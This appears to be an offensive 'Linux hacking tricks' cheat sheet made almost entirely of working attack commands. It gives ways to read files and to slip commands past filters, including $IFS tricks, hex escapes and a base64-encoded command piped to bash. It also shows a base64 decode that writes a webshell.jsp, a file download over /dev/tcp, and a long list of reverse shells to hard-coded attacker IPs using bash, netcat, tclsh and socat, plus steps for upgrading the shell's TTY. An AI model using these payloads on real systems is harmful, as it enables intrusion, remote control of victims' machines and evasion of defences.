Some Linux Hacking Tricks

 1cat /etc/issue
 2tac /etc/issue
 3less /etc/issue
 4more /etc/issue
 5head /etc/issue
 6tail /etc/issue
 7nl /etc/issue
 8xxd /etc/issue
 9sort /etc/issue
10uniq /etc/issue
11strings /etc/issue
12sed -n '1,10p' /etc/issue
13grep . /etc/issue
14python -c "print(open('/etc/issue').read())"
15perl -F: -lane 'print "@F[0..4]\n"' /etc/issue
16ruby -e 'IO.foreach("/etc/issue"){|a| print a}'
17php -r "echo file_get_contents('/etc/issue');"
18echo $(</etc/issue) or echo `</etc/issue`
19awk '{print $0}' /etc/issue
20base64 -i /etc/issue
21dd count=1000 bs=1 if=/etc/issue 2>/dev/null
22egrep|fgrep|rgrep|agrep "" /etc/issue
23rev /etc/issue
24comm /etc/issue /etc/issue
25paste /etc/issue

1echo -n "aGVsbG8gd29ybGQK"|base64 -d > webshell.jsp

1# cat /etc/issue
2$1c$2a$3t$IFS/$4e$5t$6c/$7i$8s$9s$1u$1e 
3{cat,/etc/issue}
4cat<>/etc/issue
5CMD=$'\x20/etc/issue'&&cat$CMD
6echo Y2F0IC9ldGMvaXNzdWU=|base64 -d|bash

1exec 5<>/dev/tcp/ip/port &&echo -e "GET /filename HTTP/1.0\n" >&5 && cat<&5 > filename

 1# Use Bash
 2$ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1
 3$ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196
 4$ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line; do $line 2>&5 >&5;done
 5$ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done
 6
 7# Use Netcat
 8$ nc -e /bin/sh 192.168.68.206 2333  
 9$ mkfifo fifo ; nc.traditional -u 192.168.199.199 5555 < fifo | { bash -i; } > fifo
10$ nc 192.168.199.199 5555 -c /bin/bash
11$ if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.199.199 5555 > /tmp/f
12$ if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc 192.168.199.199 5555 0</tmp/f|/bin/bash 1>/tmp/f
13$ nc 192.168.68.206 2333|/bin/sh|nc 192.168.68.206 2444  
14
15# Use TCHsh
16$ echo 'set s [socket 192.168.199.199 5555];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh # tcp
17
18# Use Socat
19$ socat tcp-connect:192.168.199.199:5555 exec:"bash -li",pty,stderr,setsid,sigint,sane # tcp
20
21## Full list please read my blog
22## http://reverse-tcp.xyz/2017/01/08/Some-Ways-To-Create-An-Interactive-Shell-On-Linux/

1# Allow the editing of keyboard input for any other command.
2rlwrap -S "$(printf '\033[95mFS>\033[m ')" nc -lvvp 4444

 1## use Python to spawn a pty
 2python -c 'import pty; pty.spawn("/bin/bash")'
 3
 4## Using socat
 5# Socat is like netcat and it can be used to pass full TTY's over TCP connections.
 6# If socat isn't installed, you can download id from here : https://github.com/andrew-d/static-binaries
 7# On Attack Host
 8socat file:`tty`,raw,echo=0 tcp-listen:4444 
 9# On Victim
10socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
11
12## Using Expect
13cat sh.exp
14#!/usr/bin/expect
15# Spawn a shell, then allow the user to interact with it.
16# The new shell will have a good enough TTY to run tools like ssh, su and login
17spawn sh
18interact
19# In reverse shell
20expect sh.exp
21
22## Using stty options
23#
24# In reverse shell
25python -c 'import pty; pty.spawn("/bin/bash")'
26Ctrl-Z
27# In attack shell
28stty raw -echo
29fg
30# In reverse shell
31reset
32export SHELL=bash
33export TERM=xterm-256color
34stty rows <num> columns <cols>

1find / -type f -name "*.*" | xargs grep "htmlstring"